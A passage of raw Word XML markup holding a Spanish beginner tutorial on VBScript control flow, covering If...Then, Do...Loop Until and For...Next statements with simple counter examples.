        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8412"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="2536"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="841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 = 0 Then</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="170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variable es igual a 0. (Función 1) E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 &gt; 0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variable es diferente a 0 y es mayor que 0. (Función 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variable es diferente a 0 y es menor que 0. (Función 3)</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tc>
      </w:tr>
    </w:tbl>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daría como resultado algo así:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1332"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3829050" cy="2771140"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1721" name="Picture 1721"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="1721" name="Picture 1721"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3829050" cy="2771140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Hemos visto la sintaxis básica de la sentencia If, pero hay otras formas mas cortas de usarla, si cumplimos una serie de condiciones. Si recordáis, la sintaxis de la sentencia If, era así:</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If var1 = 0 Then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="808080"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="808080"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="808080"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="808080"/>
        </w:pBdr>
        <w:spacing w:after="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la condición se cumple (variable es igual a 0) Else</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la condición no se cumple (variable diferente a 0)</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spacing w:after="322"/>
        <w:ind w:left="93" w:right="17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mos, en este caso podemos ejecutar </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>una serie de acciones si la condición se cumple y otras si no lo hace</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Pero si a nosotros solo nos interesa cuando se cumple la condición, podemos usar una </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>variante de la sentencia</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, mas acortada:</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1 = 0 Then</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án si se cumple la condición.</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ind w:left="93" w:right="167"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Como veis, de esta forma se ejecutan solo acciones cuando la condición se cumple, pero no cuando no se cumple. Es una forma mas abreviada de utilizar la sentencia if, si solo nos interesa saber si se da o no una condición.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="318"/>
        <w:ind w:left="93"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pero aun existe otra forma mas corta aun de utilizar la sentencia if, que es la siguiente:</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If var1 = 0 Then var2 = true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:ind w:left="93" w:right="16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 decir, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>todo en una línea</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Este se utiliza cuando solo se quiere ejecutar una orden si la condición se cumple. En este caso, la orden es var2 = true, pero podría haber sido cualquier otra orden, pero solo un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esto es lo más básico en lo que respecta al uso de la Sentencia If en un script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="32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Otra de las sentencias que alteran el flujo es la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sentencia Do…Loop</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lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sentencia Do...Loop</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> sirve para </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">crear un bucle </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>del que solo se puede salir si una</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variable contiene un valor determinado. Se coloca en el script de la siguiente maner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infinitamente hasta que Variable sea igual a 1.</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Loop Until Variable="1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:ind w:left="93" w:right="171"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En la primera línea</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> colocamos la partícula Do que indica el comienzo del bucle. Cabe destacar que en Visual Basic 6, es aquí, y no al lado del Loop donde va el Until Variable = 1, por si algún día avanzáis mas en la programación que no se os olvide. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:ind w:left="93" w:right="161"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En la segunda línea</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> estarían las funciones que se irían realizando continuamente hasta que la condición de la tercera línea se cumpliera. Si no se cumple, el bucle es infinito: no pararía nunca de repetirse…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:ind w:left="93" w:right="157"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En la tercera línea </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">encontramos la partícula Loop que indica que vuelva al punto donde esta la partícula Do. A la derecha de Loop se coloca Until y el nombre de una variable seguido de un operador de comparación (Igualdad (=), Desigualdad (&lt;&gt;), Menor que (&lt;), Mayor que (&gt;), Menor o igual que (&lt;=) o Mayor o igual que (&gt;=)) y una expresión (similar a la expresión que se coloca en la Sentencia If) que hará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se cumple, se salga del bucle y se continúe la ejecución del script. En </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>realidad</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> su uso es muy parecido al de la Sentencia If, solo que modifica el flujo de otra forma.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="322"/>
        <w:ind w:left="93" w:right="161"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Un apunte:</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> La partícula Until se puede omitir, pero esto crearía un bucle infinito que solo podríamos cerrar apagando el ordenador o cerrando el proceso Wscript.exe mediante el administrador de tareas. En este caso el script se quedaría así:</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unciones que se ejecutaran infinitamente. </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Loop</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Un ejemplo de uso de </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>la sentencia Do</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> con las variables seria el siguiente (se obvia la creación de la variable con el Option Explicit y el Dim):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="6702" w:type="dxa"/>
        <w:tblInd w:w="21" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="79" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2644"/>
        <w:gridCol w:w="4058"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="1156"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2540"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variable+1 Loop Until variable = "6"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="41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Le damos a Variable el valor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Creamos bucl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ñadimos a variable 1 a su valor actual.</w:t>
            </w:r>
          </w:p>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alimos del bucle cuando la variable es 6. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="322"/>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hace que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>el bucle se repita un total de 5 veces</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, ya que el valor inicial de Variable es 1, y para romper el bucle (una vez entrado en el) Variable debe tomar el valor 6, y por tanto 6-1 = 5 repeticiones. </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Para que lo entendáis mejor, este ejemplo anterior es como poner el siguiente script, solo que como ya veremos, habrá veces que no sabremos cual es el valor de variable en ese momento, o las veces que se debe repetir, etc:</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5633"/>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1 variable=variable+1 variable=variable+1 variable=variable+1 variable=variable+1 variable=variable+1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:ind w:left="93" w:right="16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ambién podemos meter un bucle dentro de otro, o un bucle dentro de una sentencia If, o la sentencia If en el bucle, etc… Las posibilidades son infinitas, y cada vez van aumentando. Recomiendo que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>se te quede claro todo lo visto</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> hasta ahora antes de continuar con la siguiente sentencia.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:ind w:left="93" w:right="164"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Continuemos, pues. La sentencia Do…Loop…Until crea, como hemos visto, bucles de condición. Es decir, si se cumple la condición que se expresa se sale del bucle, o bien se mantiene en el bucle mientras la “</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Not condicion</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">” se cumple. Pero que pasa si lo que queremos es un bucle de repetición; es decir, un bucle que se repita X veces y punto. Pues para eso tenemos la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Sentencia For…Next</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="322"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sentencia For</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> sirve para </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">crear un bucle </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a partir de una</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variable </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>(a la que se le da un valor numérico inicial)</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que rompe ese bucle al llegar a un determinado valor. Se expresa de la siguiente form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variable = 0 To 10 Step 2</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hará que el bucle se repita hasta que variable (que al principio toma el valor 0) tome el valor 10, sumando automáticamente 2 cada vez que el bucle se va a repetir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:ind w:left="93" w:right="156"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En la primera línea</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> colocamos la partícula For seguida del nombre de una variable. A esta mediante el signo igual (=) se le asigna un valor inicial.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colocamos la partícula To seguida de un valor final, que hará que el bucle se detenga al alcanzarlo. Luego va la partícula Step, que indica el incremento de la variable en cada repetición. Cada vez que se pasa por la partícula Next a la variable </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">se le suma el valor de después de Step, y de esa forma el bucle se romperá cuando la variable alcance o supere el valor final. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:ind w:left="93" w:right="167"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En la segunda línea</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> se colocan las funciones que se ejecutaran durante el bucle. Estas se repetirán hasta que variable alcance el valor final. Por supuesto aquí </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>pueden</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> haber tantas líneas de código como se desee, y se pueden colocar dentro todos los alteradores del flujo que hay (excepto posteriormente el Function).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:ind w:left="93" w:right="163"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En la tercera línea</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> colocamos la partícula Next que hace retornar el bucle a la partícula For y añade al valor de la variable el valor de paso (después de Step). Si al llegar aquí el valor de la variable es mayor que el final el bucle se romperá y el script continuará su ejecución.</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Un ejemplo de uso de esta sentencia seria el siguiente (de nuevo, obviamos la creación de las variabl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variable=1 To 1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variable 1 * variable2</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ind w:left="93" w:right="17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mos, hemos omitido el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Step X</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
